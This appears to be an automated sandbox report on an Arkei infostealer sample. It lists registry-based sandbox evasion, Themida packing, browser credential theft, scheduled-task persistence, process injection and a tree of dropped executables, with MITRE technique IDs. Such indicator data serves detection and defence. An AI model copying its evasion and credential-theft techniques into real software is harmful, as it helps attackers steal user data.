arkei | 64506751e65ec41605c04620d393cdf9338ce76d31d8b0868dbdfce88f086a03

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	cBHStp1tUjbmpWGPeFPixzx7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	wn6Tr5ouTTYnpiBNWaXIcaFu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	wn6Tr5ouTTYnpiBNWaXIcaFu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	dsqTtt9nQpWwz1yYMBAEipS6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	dsqTtt9nQpWwz1yYMBAEipS6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Up_EgQSePP1xxhPBvlLFqEqe.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	kMCLvaZxUoL4ETDwWQqOc6MX.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	kMCLvaZxUoL4ETDwWQqOc6MX.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	cBHStp1tUjbmpWGPeFPixzx7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Up_EgQSePP1xxhPBvlLFqEqe.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	yJqr3GGVaG4To30s0MDWLG61.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	yJqr3GGVaG4To30s0MDWLG61.exe

Loads dropped DLL 2 IoCs

pid	Process
5364	iJ_zxQndnIcJiYyrXyCpQokM.exe
5364	iJ_zxQndnIcJiYyrXyCpQokM.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 10 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral2/files/0x000500000000c300-186.dat	themida
behavioral2/files/0x000700000000c8df-189.dat	themida
behavioral2/files/0x0003000000009c70-188.dat	themida
behavioral2/files/0x000300000001e5e7-205.dat	themida
behavioral2/memory/4936-253-0x0000000000B30000-0x0000000000B31000-memory.dmp	themida
behavioral2/memory/3736-272-0x0000000000DB0000-0x0000000000DB1000-memory.dmp	themida
behavioral2/memory/4532-264-0x0000000000C20000-0x0000000000C21000-memory.dmp	themida
behavioral2/memory/884-341-0x0000000000900000-0x0000000000901000-memory.dmp	themida
behavioral2/files/0x000100000002b20c-412.dat	themida
behavioral2/files/0x000400000002b1fc-428.dat	themida

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 6 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	yJqr3GGVaG4To30s0MDWLG61.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	wn6Tr5ouTTYnpiBNWaXIcaFu.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cBHStp1tUjbmpWGPeFPixzx7.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Up_EgQSePP1xxhPBvlLFqEqe.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	kMCLvaZxUoL4ETDwWQqOc6MX.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	dsqTtt9nQpWwz1yYMBAEipS6.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 8 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
107	ipinfo.io
107	ip-api.com
120	ipinfo.io
163	ipinfo.io
165	api.db-ip.com
167	api.db-ip.com
3	ipinfo.io
37	ipinfo.io

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

pid	Process
884	dsqTtt9nQpWwz1yYMBAEipS6.exe
4936	yJqr3GGVaG4To30s0MDWLG61.exe
3736	wn6Tr5ouTTYnpiBNWaXIcaFu.exe
4532	cBHStp1tUjbmpWGPeFPixzx7.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 4492 set thread context of 5324	4492	Up_EgQSePP1xxhPBvlLFqEqe.exe	119
PID 3312 set thread context of 6048	3312	schtasks.exe	130

Drops file in Program Files directory 6 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	XATuOQAsPCyh5ifJCHUEKp4p.exe
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	XATuOQAsPCyh5ifJCHUEKp4p.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\cutm3.exe	DJQTgMZwK7ZPTQPNMIvPAKa5.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe	DJQTgMZwK7ZPTQPNMIvPAKa5.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\Uninstall.exe	DJQTgMZwK7ZPTQPNMIvPAKa5.exe
File created	C:\Program Files (x86)\Company\NewProduct\Uninstall.ini	DJQTgMZwK7ZPTQPNMIvPAKa5.exe

Drops file in Windows directory 7 IoCs

description	ioc	Process
File opened for modification	C:\Windows\WindowsUpdate.log	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\DataStore.edb	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\ReportingEvents.log	svchost.exe
File created	C:\Windows\AppCompat\Programs\Amcache.hve.tmp	WerFault.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 12 IoCs

pid	pid_target	Process	procid_target
5968	2680	WerFault.exe	89
5832	5036	WerFault.exe	102
6084	4624	WerFault.exe	88
5440	768	WerFault.exe	93
3204	1476	WerFault.exe	90
6088	4752	WerFault.exe	87
6080	4076	WerFault.exe	104
5804	4640	WerFault.exe	92
4696	228	WerFault.exe	199
2156	2360	WerFault.exe	217
4172	4080	WerFault.exe	213
1560	5044	WerFault.exe	216

NSIS installer 4 IoCs

installer

resource	yara_rule
behavioral2/files/0x000100000002b1c9-291.dat	nsis_installer_1
behavioral2/files/0x000100000002b1c9-291.dat	nsis_installer_2
behavioral2/files/0x000100000002b1c9-303.dat	nsis_installer_1
behavioral2/files/0x000100000002b1c9-303.dat	nsis_installer_2

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Gn5a2G1hE46fGK_8y4mb1keQ.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Gn5a2G1hE46fGK_8y4mb1keQ.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Gn5a2G1hE46fGK_8y4mb1keQ.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
5608	schtasks.exe
3792	schtasks.exe
3312	schtasks.exe

Kills process with taskkill 3 IoCs

evasion

pid	Process
104	taskkill.exe
3716	taskkill.exe
5772	taskkill.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe
4728	jbA8_s3FlxHrMmUQPOwNJfp8.exe

Suspicious use of AdjustPrivilegeToken 46 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2412	svchost.exe
Token: SeCreatePagefilePrivilege	2412	svchost.exe
Token: SeShutdownPrivilege	2412	svchost.exe
Token: SeCreatePagefilePrivilege	2412	svchost.exe
Token: SeShutdownPrivilege	2412	svchost.exe
Token: SeCreatePagefilePrivilege	2412	svchost.exe
Token: SeShutdownPrivilege	1408	svchost.exe
Token: SeCreatePagefilePrivilege	1408	svchost.exe
Token: SeCreateTokenPrivilege	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: SeAssignPrimaryTokenPrivilege	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: SeLockMemoryPrivilege	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: SeIncreaseQuotaPrivilege	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: SeMachineAccountPrivilege	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: SeTcbPrivilege	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: SeSecurityPrivilege	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: SeTakeOwnershipPrivilege	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: SeLoadDriverPrivilege	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: SeSystemProfilePrivilege	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: SeSystemtimePrivilege	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: SeProfSingleProcessPrivilege	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: SeIncBasePriorityPrivilege	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: SeCreatePagefilePrivilege	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: SeCreatePermanentPrivilege	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: SeBackupPrivilege	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: SeRestorePrivilege	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: SeShutdownPrivilege	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: SeDebugPrivilege	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: SeAuditPrivilege	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: SeSystemEnvironmentPrivilege	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: SeChangeNotifyPrivilege	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: SeRemoteShutdownPrivilege	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: SeUndockPrivilege	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: SeSyncAgentPrivilege	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: SeEnableDelegationPrivilege	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: SeManageVolumePrivilege	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: SeImpersonatePrivilege	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: SeCreateGlobalPrivilege	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: 31	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: 32	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: 33	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: 34	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: 35	1476	XMGMTu3eQAvQPR86eRMXlDO9.exe
Token: SeDebugPrivilege	3944	o6NHz5BzimLqOLMlh9XEgPbX.exe
Token: SeRestorePrivilege	5832	WerFault.exe
Token: SeBackupPrivilege	5832	WerFault.exe
Token: SeBackupPrivilege	5832	WerFault.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1408 wrote to memory of 5092	1408	svchost.exe	84
PID 1408 wrote to memory of 5092	1408	svchost.exe	84
PID 1436 wrote to memory of 4728	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	85
PID 1436 wrote to memory of 4728	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	85
PID 1436 wrote to memory of 4752	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	87
PID 1436 wrote to memory of 4752	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	87
PID 1436 wrote to memory of 4752	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	87
PID 1436 wrote to memory of 4492	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	86
PID 1436 wrote to memory of 4492	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	86
PID 1436 wrote to memory of 4492	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	86
PID 1436 wrote to memory of 4624	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	88
PID 1436 wrote to memory of 4624	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	88
PID 1436 wrote to memory of 4624	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	88
PID 1436 wrote to memory of 2680	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	89
PID 1436 wrote to memory of 2680	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	89
PID 1436 wrote to memory of 2680	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	89
PID 1436 wrote to memory of 1476	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	90
PID 1436 wrote to memory of 1476	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	90
PID 1436 wrote to memory of 1476	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	90
PID 1436 wrote to memory of 3944	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	94
PID 1436 wrote to memory of 3944	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	94
PID 1436 wrote to memory of 3944	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	94
PID 1436 wrote to memory of 4400	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	95
PID 1436 wrote to memory of 4400	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	95
PID 1436 wrote to memory of 4400	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	95
PID 1436 wrote to memory of 768	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	93
PID 1436 wrote to memory of 768	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	93
PID 1436 wrote to memory of 768	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	93
PID 1436 wrote to memory of 4640	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	92
PID 1436 wrote to memory of 4640	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	92
PID 1436 wrote to memory of 4640	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	92
PID 1436 wrote to memory of 4936	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	91
PID 1436 wrote to memory of 4936	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	91
PID 1436 wrote to memory of 4936	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	91
PID 1436 wrote to memory of 3736	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	98
PID 1436 wrote to memory of 3736	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	98
PID 1436 wrote to memory of 3736	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	98
PID 1436 wrote to memory of 884	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	97
PID 1436 wrote to memory of 884	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	97
PID 1436 wrote to memory of 884	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	97
PID 1436 wrote to memory of 2964	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	96
PID 1436 wrote to memory of 2964	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	96
PID 1436 wrote to memory of 2964	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	96
PID 1436 wrote to memory of 3312	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	103
PID 1436 wrote to memory of 3312	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	103
PID 1436 wrote to memory of 3312	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	103
PID 1436 wrote to memory of 5036	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	102
PID 1436 wrote to memory of 5036	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	102
PID 1436 wrote to memory of 5036	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	102
PID 1436 wrote to memory of 4196	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	101
PID 1436 wrote to memory of 4196	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	101
PID 1436 wrote to memory of 4196	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	101
PID 1436 wrote to memory of 4532	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	100
PID 1436 wrote to memory of 4532	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	100
PID 1436 wrote to memory of 4532	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	100
PID 1436 wrote to memory of 4760	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	99
PID 1436 wrote to memory of 4760	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	99
PID 1436 wrote to memory of 2088	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	105
PID 1436 wrote to memory of 2088	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	105
PID 1436 wrote to memory of 2088	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	105
PID 1436 wrote to memory of 4076	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	104
PID 1436 wrote to memory of 4076	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	104
PID 1436 wrote to memory of 4076	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	104
PID 1436 wrote to memory of 2172	1436	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	107

C:\Users\Admin\AppData\Local\Temp\022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
"C:\Users\Admin\AppData\Local\Temp\022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1436
- C:\Users\Admin\Pictures\Adobe Films\jbA8_s3FlxHrMmUQPOwNJfp8.exe
  "C:\Users\Admin\Pictures\Adobe Films\jbA8_s3FlxHrMmUQPOwNJfp8.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:4728
- C:\Users\Admin\Pictures\Adobe Films\Up_EgQSePP1xxhPBvlLFqEqe.exe
  "C:\Users\Admin\Pictures\Adobe Films\Up_EgQSePP1xxhPBvlLFqEqe.exe"
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of SetThreadContext
  PID:4492
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:5324
  - - C:\Users\Admin\AppData\Local\Temp\fl.exe
      "C:\Users\Admin\AppData\Local\Temp\fl.exe"
      4⤵
      PID:4520
    - - C:\Users\Admin\AppData\Local\Temp\Curarization.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Curarization.exe"
        5⤵
        
        PID:1696
- C:\Users\Admin\Pictures\Adobe Films\97tPLM1BD83QAkW3t_oh9ywr.exe
  "C:\Users\Admin\Pictures\Adobe Films\97tPLM1BD83QAkW3t_oh9ywr.exe"
  2⤵
  - Executes dropped EXE
  PID:4752
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4752 -s 292
    3⤵
    - Program crash
    PID:6088
- C:\Users\Admin\Pictures\Adobe Films\6Gjg3NTuW9hb7SqYymgdkeKo.exe
  "C:\Users\Admin\Pictures\Adobe Films\6Gjg3NTuW9hb7SqYymgdkeKo.exe"
  2⤵
  - Executes dropped EXE
  PID:4624
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4624 -s 296
    3⤵
    - Program crash
    PID:6084
- C:\Users\Admin\Pictures\Adobe Films\tG94gZUleeBFo8SDyi6butFz.exe
  "C:\Users\Admin\Pictures\Adobe Films\tG94gZUleeBFo8SDyi6butFz.exe"
  2⤵
  - Executes dropped EXE
  PID:2680
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2680 -s 300
    3⤵
    - Program crash
    PID:5968
- C:\Users\Admin\Pictures\Adobe Films\XMGMTu3eQAvQPR86eRMXlDO9.exe
  "C:\Users\Admin\Pictures\Adobe Films\XMGMTu3eQAvQPR86eRMXlDO9.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1476
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 1984
    3⤵
    - Program crash
    PID:3204
- C:\Users\Admin\Pictures\Adobe Films\yJqr3GGVaG4To30s0MDWLG61.exe
  "C:\Users\Admin\Pictures\Adobe Films\yJqr3GGVaG4To30s0MDWLG61.exe"
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:4936
- C:\Users\Admin\Pictures\Adobe Films\KdlTj_CCMiXvvrf22JrhXXT5.exe
  "C:\Users\Admin\Pictures\Adobe Films\KdlTj_CCMiXvvrf22JrhXXT5.exe"
  2⤵
  - Executes dropped EXE
  PID:4640
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4640 -s 276
    3⤵
    - Program crash
    PID:5804
- C:\Users\Admin\Pictures\Adobe Films\cTOmx3wyJ995falPyP_CHHr6.exe
  "C:\Users\Admin\Pictures\Adobe Films\cTOmx3wyJ995falPyP_CHHr6.exe"
  2⤵
  - Executes dropped EXE
  PID:768
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 768 -s 300
    3⤵
    - Program crash
    PID:5440
- C:\Users\Admin\Pictures\Adobe Films\o6NHz5BzimLqOLMlh9XEgPbX.exe
  "C:\Users\Admin\Pictures\Adobe Films\o6NHz5BzimLqOLMlh9XEgPbX.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:3944
- - C:\Users\Admin\AppData\Roaming\2905016.exe
    "C:\Users\Admin\AppData\Roaming\2905016.exe"
    3⤵
    - Executes dropped EXE
    PID:6140
- - C:\Users\Admin\AppData\Roaming\3915497.exe
    "C:\Users\Admin\AppData\Roaming\3915497.exe"
    3⤵
    PID:5116
